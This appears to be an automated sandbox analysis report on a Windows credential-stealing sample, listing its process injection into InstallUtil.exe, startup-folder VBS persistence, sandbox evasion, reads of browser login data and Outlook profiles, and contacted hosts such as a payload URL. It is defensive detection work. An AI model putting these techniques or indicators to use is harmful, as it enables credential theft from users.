                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: Ref#116670.exe, 00000000.00000002.2270089173.0000000006700000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: TUmyRCEx7iWm3dHgFsl
                    Source: InstallUtil.exe, 00000003.00000002.3284277419.0000000000FF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                    Source: vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: Ref#116670.exe, 00000000.00000002.2249245132.000000000084E000.00000004.00000020.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2495432018.0000000000BD1000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3285264512.0000000000C55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 3_2_0128C148 LdrInitializeThunk,LdrInitializeThunk,3_2_0128C148
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Ref#116670.exe, PortablePublisher.csReference to suspicious API methods: EngineConsumer.RunVirtualAllocator(_000E_2009_2002_2005_0003(), reference, pol, isproc)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, ResourceReferenceValue.csReference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C00008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7DD008Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeQueries volume information: C:\Users\user\Desktop\Ref#116670.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Users\user\AppData\Roaming\vdvfyt.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4956, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3287082945.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3283657783.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3286734948.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4956, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 4956, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts1
                    Native API
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job
                    1
                    DLL Side-Loading
                    211
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    LSASS Memory13
                    System Information Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job
                    1
                    Scheduled Task/Job
                    2
                    Obfuscated Files or Information
                    Security Account Manager21
                    Security Software Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron2
                    Registry Run Keys / Startup Folder
                    2
                    Registry Run Keys / Startup Folder
                    1
                    Software Packing
                    NTDS1
                    Process Discovery
                    Distributed Component Object ModelInput Capture13
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets31
                    Virtualization/Sandbox Evasion
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials1
                    Application Window Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion
                    DCSync1
                    System Network Configuration Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567428 Sample: Ref#116670.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 30 reallyfreegeoip.org 2->30 32 oshi.at 2->32 34 2 other IPs or domains 2->34 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Multi AV Scanner detection for submitted file 2->56 60 10 other signatures 2->60 8 Ref#116670.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 58 Tries to detect the country of the analysis system (by using the IP) 30->58 process4 dnsIp5 36 oshi.at 194.15.112.248, 443, 49713, 49738 INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB Ukraine 8->36 24 C:\Users\user\AppData\Roaming\vdvfyt.exe, PE32 8->24 dropped 26 C:\Users\user\...\vdvfyt.exe:Zone.Identifier, ASCII 8->26 dropped 28 C:\Users\user\AppData\Roaming\...\vdvfyt.vbs, ASCII 8->28 dropped 66 Drops VBS files to the startup folder 8->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->68 70 Writes to foreign memory regions 8->70 72 Injects a PE file into a foreign processes 8->72 15 InstallUtil.exe 14 2 8->15         started        74 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->74 19 vdvfyt.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 38 checkip.dyndns.com 132.226.247.73, 49716, 49774, 80 UTMEMUS United States 15->38 40 reallyfreegeoip.org 172.67.177.134, 443, 49722, 49780 CLOUDFLARENETUS United States 15->40 42 Tries to steal Mail credentials (via file / registry access) 15->42 44 Multi AV Scanner detection for dropped file 19->44 46 Machine Learning detection for dropped file 19->46 48 Writes to foreign memory regions 19->48 50 Injects a PE file into a foreign processes 19->50 21 InstallUtil.exe 2 19->21         started        signatures10 process11 signatures12 62 Tries to steal Mail credentials (via file / registry access) 21->62 64 Tries to harvest and steal browser information (history, passwords, etc) 21->64

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    Ref#116670.exe18%ReversingLabs
                    Ref#116670.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\vdvfyt.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\vdvfyt.exe18%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://oshi.at/RMDT0%Avira URL Cloudsafe
                    https://oshi.at0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    oshi.at
                    194.15.112.248
                    truefalse
                      high
                      reallyfreegeoip.org
                      172.67.177.134
                      truefalse
                        high
                        checkip.dyndns.com
                        132.226.247.73
                        truefalse
                          high
                          checkip.dyndns.org
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://oshi.at/RMDTfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://checkip.dyndns.org/false
                              high
                              https://reallyfreegeoip.org/xml/8.46.123.228false
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://stackoverflow.com/q/14436606/23354Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/mgravell/protobuf-netJRef#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://reallyfreegeoip.orgdInstallUtil.exe, 00000003.00000002.3287082945.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000293D000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://ocsps.ssl.com0?Ref#116670.exe, vdvfyt.exe.0.drfalse
                                        high
                                        http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                          high
                                          https://github.com/mgravell/protobuf-netRef#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                            high
                                            https://oshi.atRef#116670.exe, 00000000.00000002.2250767887.0000000002681000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.0000000002951000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0QRef#116670.exe, vdvfyt.exe.0.drfalse
                                              high
                                              http://ocsps.ssl.com0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                high
                                                https://reallyfreegeoip.org/xml/8.46.123.228dInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                    high
                                                    http://checkip.dyndns.orgInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3287082945.0000000002D93000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.000000000290B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                        high
                                                        http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                          high
                                                          http://crls.ssl.com/ssl.com-rsa-RootCA.crl0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                            high
                                                            https://github.com/mgravell/protobuf-netiRef#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                              high
                                                              http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0Ref#116670.exe, vdvfyt.exe.0.drfalse
                                                                high
                                                                http://checkip.dyndns.comdInstallUtil.exe, 00000003.00000002.3287082945.0000000002DB6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3286734948.0000000002920000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://stackoverflow.com/q/11564914/23354;Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                    high
